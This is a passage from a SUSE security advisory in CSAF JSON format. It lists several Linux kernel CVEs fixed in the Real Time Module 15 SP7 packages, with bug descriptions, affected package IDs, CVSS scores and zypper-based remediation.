"product_reference": "ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"relates_to_product_reference": "SUSE Real Time Module 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-53714",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53714"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/stm: ltdc: fix late dereference check\n\nIn ltdc_crtc_set_crc_source(), struct drm_crtc was dereferenced in a\ncontainer_of() before the pointer check. This could cause a kernel panic.\n\nFix this smatch warning:\ndrivers/gpu/drm/stm/ltdc.c:1124 ltdc_crtc_set_crc_source() warn: variable dereferenced before check \u0027crtc\u0027 (see line 1119)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53714",
"url": "https://www.suse.com/security/cve/CVE-2023-53714"
},
{
"category": "external",
"summary": "SUSE Bug 1254465 for CVE-2023-53714",
"url": "https://bugzilla.suse.com/1254465"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2023-53714"
},
{
"cve": "CVE-2023-54013",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54013"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninterconnect: Fix locking for runpm vs reclaim\n\nFor cases where icc_bw_set() can be called in callbaths that could\ndeadlock against shrinker/reclaim, such as runpm resume, we need to\ndecouple the icc locking. Introduce a new icc_bw_lock for cases where\nwe need to serialize bw aggregation and update to decouple that from\npaths that require memory allocation such as node/link creation/\ndestruction.\n\nFixes this lockdep splat:\n\n ======================================================\n WARNING: possible circular locking dependency detected\n 6.2.0-rc8-debug+ #554 Not tainted\n ------------------------------------------------------\n ring0/132 is trying to acquire lock:\n ffffff80871916d0 (\u0026gmu-\u003elock){+.+.}-{3:3}, at: a6xx_pm_resume+0xf0/0x234\n\n but task is already holding lock:\n ffffffdb5aee57e8 (dma_fence_map){++++}-{0:0}, at: msm_job_run+0x68/0x150\n\n which lock already depends on the new lock.\n\n the existing dependency chain (in reverse order) is:\n\n -\u003e #4 (dma_fence_map){++++}-{0:0}:\n __dma_fence_might_wait+0x74/0xc0\n dma_resv_lockdep+0x1f4/0x2f4\n do_one_initcall+0x104/0x2bc\n kernel_init_freeable+0x344/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #3 (mmu_notifier_invalidate_range_start){+.+.}-{0:0}:\n fs_reclaim_acquire+0x80/0xa8\n slab_pre_alloc_hook.constprop.0+0x40/0x25c\n __kmem_cache_alloc_node+0x60/0x1cc\n __kmalloc+0xd8/0x100\n topology_parse_cpu_capacity+0x8c/0x178\n get_cpu_for_node+0x88/0xc4\n parse_cluster+0x1b0/0x28c\n parse_cluster+0x8c/0x28c\n init_cpu_topology+0x168/0x188\n smp_prepare_cpus+0x24/0xf8\n kernel_init_freeable+0x18c/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #2 (fs_reclaim){+.+.}-{0:0}:\n __fs_reclaim_acquire+0x3c/0x48\n fs_reclaim_acquire+0x54/0xa8\n slab_pre_alloc_hook.constprop.0+0x40/0x25c\n __kmem_cache_alloc_node+0x60/0x1cc\n __kmalloc+0xd8/0x100\n kzalloc.constprop.0+0x14/0x20\n icc_node_create_nolock+0x4c/0xc4\n icc_node_create+0x38/0x58\n qcom_icc_rpmh_probe+0x1b8/0x248\n platform_probe+0x70/0xc4\n really_probe+0x158/0x290\n __driver_probe_device+0xc8/0xe0\n driver_probe_device+0x44/0x100\n __driver_attach+0xf8/0x108\n bus_for_each_dev+0x78/0xc4\n driver_attach+0x2c/0x38\n bus_add_driver+0xd0/0x1d8\n driver_register+0xbc/0xf8\n __platform_driver_register+0x30/0x3c\n qnoc_driver_init+0x24/0x30\n do_one_initcall+0x104/0x2bc\n kernel_init_freeable+0x344/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #1 (icc_lock){+.+.}-{3:3}:\n __mutex_lock+0xcc/0x3c8\n mutex_lock_nested+0x30/0x44\n icc_set_bw+0x88/0x2b4\n _set_opp_bw+0x8c/0xd8\n _set_opp+0x19c/0x300\n dev_pm_opp_set_opp+0x84/0x94\n a6xx_gmu_resume+0x18c/0x804\n a6xx_pm_resume+0xf8/0x234\n adreno_runtime_resume+0x2c/0x38\n pm_generic_runtime_resume+0x30/0x44\n __rpm_callback+0x15c/0x174\n rpm_callback+0x78/0x7c\n rpm_resume+0x318/0x524\n __pm_runtime_resume+0x78/0xbc\n adreno_load_gpu+0xc4/0x17c\n msm_open+0x50/0x120\n drm_file_alloc+0x17c/0x228\n drm_open_helper+0x74/0x118\n drm_open+0xa0/0x144\n drm_stub_open+0xd4/0xe4\n chrdev_open+0x1b8/0x1e4\n do_dentry_open+0x2f8/0x38c\n vfs_open+0x34/0x40\n path_openat+0x64c/0x7b4\n do_filp_open+0x54/0xc4\n do_sys_openat2+0x9c/0x100\n do_sys_open+0x50/0x7c\n __arm64_sys_openat+0x28/0x34\n invoke_syscall+0x8c/0x128\n el0_svc_common.constprop.0+0xa0/0x11c\n do_el0_\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54013",
"url": "https://www.suse.com/security/cve/CVE-2023-54013"
},
{
"category": "external",
"summary": "SUSE Bug 1256280 for CVE-2023-54013",
"url": "https://bugzilla.suse.com/1256280"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2023-54013"
},
{
"cve": "CVE-2024-27005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-27005"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninterconnect: Don\u0027t access req_list while it\u0027s being manipulated\n\nThe icc_lock mutex was split into separate icc_lock and icc_bw_lock\nmutexes in [1] to avoid lockdep splats. However, this didn\u0027t adequately\nprotect access to icc_node::req_list.\n\nThe icc_set_bw() function will eventually iterate over req_list while\nonly holding icc_bw_lock, but req_list can be modified while only\nholding icc_lock. This causes races between icc_set_bw(), of_icc_get(),\nand icc_put().\n\nExample A:\n\n CPU0 CPU1\n ---- ----\n icc_set_bw(path_a)\n mutex_lock(\u0026icc_bw_lock);\n icc_put(path_b)\n mutex_lock(\u0026icc_lock);\n aggregate_requests()\n hlist_for_each_entry(r, ...\n hlist_del(...\n \u003cr = invalid pointer\u003e\n\nExample B:\n\n CPU0 CPU1\n ---- ----\n icc_set_bw(path_a)\n mutex_lock(\u0026icc_bw_lock);\n path_b = of_icc_get()\n of_icc_get_by_index()\n mutex_lock(\u0026icc_lock);\n path_find()\n path_init()\n aggregate_requests()\n hlist_for_each_entry(r, ...\n hlist_add_head(...\n \u003cr = invalid pointer\u003e\n\nFix this by ensuring icc_bw_lock is always held before manipulating\nicc_node::req_list. The additional places icc_bw_lock is held don\u0027t\nperform any memory allocations, so we should still be safe from the\noriginal lockdep splats that motivated the separate locks.\n\n[1] commit af42269c3523 (\"interconnect: Fix locking for runpm vs reclaim\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-27005",
"url": "https://www.suse.com/security/cve/CVE-2024-27005"
},
{
"category": "external",
"summary": "SUSE Bug 1223800 for CVE-2024-27005",
"url": "https://bugzilla.suse.com/1223800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2024-27005"
},
{
"cve": "CVE-2024-42103",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-42103"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix adding block group to a reclaim list and the unused list during reclaim\n\nThere is a potential parallel list adding for retrying in\nbtrfs_reclaim_bgs_work and adding to the unused list. Since the block\ngroup is removed from the reclaim list and it is on a relocation work,\nit can be added into the unused list in parallel. When that happens,\nadding it to the reclaim list will corrupt the list head and trigger\nlist corruption like below.\n\nFix it by taking fs_info-\u003eunused_bgs_lock.\n\n [177.504][T2585409] BTRFS error (device nullb1): error relocating ch= unk 2415919104\n [177.514][T2585409] list_del corruption. next-\u003eprev should be ff1100= 0344b119c0, but was ff11000377e87c70. (next=3Dff110002390cd9c0)\n [177.529][T2585409] ------------[ cut here ]------------\n [177.537][T2585409] kernel BUG at lib/list_debug.c:65!\n [177.545][T2585409] Oops: invalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\n [177.555][T2585409] CPU: 9 PID: 2585409 Comm: kworker/u128:2 Tainted: G W 6.10.0-rc5-kts #1\n [177.568][T2585409] Hardware name: Supermicro SYS-520P-WTR/X12SPW-TF, BIOS 1.2 02/14/2022\n [177.579][T2585409] Workqueue: events_unbound btrfs_reclaim_bgs_work[btrfs]\n [177.589][T2585409] RIP: 0010:__list_del_entry_valid_or_report.cold+0x70/0x72\n [177.624][T2585409] RSP: 0018:ff11000377e87a70 EFLAGS: 00010286\n [177.633][T2585409] RAX: 000000000000006d RBX: ff11000344b119c0 RCX:0000000000000000\n [177.644][T2585409] RDX: 000000000000006d RSI: 0000000000000008 RDI:ffe21c006efd0f40\n [177.655][T2585409] RBP: ff110002e0509f78 R08: 0000000000000001 R09:ffe21c006efd0f08\n [177.665][T2585409] R10: ff11000377e87847 R11: 0000000000000000 R12:ff110002390cd9c0\n [177.676][T2585409] R13: ff11000344b119c0 R14: ff110002e0508000 R15:dffffc0000000000\n [177.687][T2585409] FS: 0000000000000000(0000) GS:ff11000fec880000(0000) knlGS:0000000000000000\n [177.700][T2585409] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [177.709][T2585409] CR2: 00007f06bc7b1978 CR3: 0000001021e86005 CR4:0000000000771ef0\n [177.720][T2585409] DR0: 0000000000000000 DR1: 0000000000000000 DR2:0000000000000000\n [177.731][T2585409] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:0000000000000400\n [177.742][T2585409] PKRU: 55555554\n [177.748][T2585409] Call Trace:\n [177.753][T2585409] \u003cTASK\u003e\n [177.759][T2585409] ? __die_body.cold+0x19/0x27\n [177.766][T2585409] ? die+0x2e/0x50\n [177.772][T2585409] ? do_trap+0x1ea/0x2d0\n [177.779][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.788][T2585409] ? do_error_trap+0xa3/0x160\n [177.795][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.805][T2585409] ? handle_invalid_op+0x2c/0x40\n [177.812][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.820][T2585409] ? exc_invalid_op+0x2d/0x40\n [177.827][T2585409] ? asm_exc_invalid_op+0x1a/0x20\n [177.834][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72\n [177.843][T2585409] btrfs_delete_unused_bgs+0x3d9/0x14c0 [btrfs]\n\nThere is a similar retry_list code in btrfs_delete_unused_bgs(), but it is\nsafe, AFAICS. Since the block group was in the unused list, the used bytes\nshould be 0 when it was added to the unused list. Then, it checks\nblock_group-\u003e{used,reserved,pinned} are still 0 under the\nblock_group-\u003elock. So, they should be still eligible for the unused list,\nnot the reclaim list.\n\nThe reason it is safe there it\u0027s because because we\u0027re holding\nspace_info-\u003egroups_sem in write mode.\n\nThat means no other task can allocate from the block group, so while we\nare at deleted_unused_bgs() it\u0027s not possible for other tasks to\nallocate and deallocate extents from the block group, so it can\u0027t be\nadded to the unused list or the reclaim list by anyone else.\n\nThe bug can be reproduced by btrfs/166 after a few rounds. In practice\nthis can be hit when relocation cannot find more chunk space and ends\nwith ENOSPC.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-42103",
"url": "https://www.suse.com/security/cve/CVE-2024-42103"
},
{
"category": "external",
"summary": "SUSE Bug 1228490 for CVE-2024-42103",
"url": "https://bugzilla.suse.com/1228490"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2024-42103"
},
{
"cve": "CVE-2024-53070",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53070"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc3: fix fault at system suspend if device was already runtime suspended\n\nIf the device was already runtime suspended then during system suspend\nwe cannot access the device registers else it will crash.\n\nAlso we cannot access any registers after dwc3_core_exit() on some\nplatforms so move the dwc3_enable_susphy() call to the top.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53070",
"url": "https://www.suse.com/security/cve/CVE-2024-53070"
},
{
"category": "external",
"summary": "SUSE Bug 1233563 for CVE-2024-53070",
"url": "https://bugzilla.suse.com/1233563"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
